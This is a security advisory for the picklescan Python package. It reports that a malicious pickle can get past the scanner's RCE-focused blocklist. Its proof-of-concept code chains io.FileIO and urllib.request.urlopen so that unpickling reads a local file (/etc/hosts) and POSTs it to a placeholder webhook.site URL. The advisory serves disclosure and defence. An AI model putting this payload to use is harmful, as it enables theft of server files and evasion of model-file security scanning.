PT-2026-3411 · Pypi · Picklescan
Published
2026-01-08
·
Updated
2026-01-08
CVSS v4.0
8.8
High
| Vector | AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P |
Summary
Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.
Details
The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:
-
io.FileIO: Opens local files without using builtins.open.
-
urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.
-
Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.
PoC
import pickle, io, urllib.request
class GetFile:
def reduce (self):
return (io.FileIO, ('/etc/hosts', 'r'))
class Exfiltrate:
def reduce (self):
return (urllib.request.urlopen, ('https://webhook.site/YOUR UUID HERE', GetFile()))
with open("bypass http.pkl", "wb") as f:
pickle.dump(Exfiltrate(), f)Impact
- Arbitrary file read
Thanks for this library and your time. If you think
picklescan is focused on detecting only RCE kind of vulnerabilities rather adding File IO, Http or any protocol based may cause lot of noise, feel free to close this issue.Fix
SSRF
Path traversal
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Picklescan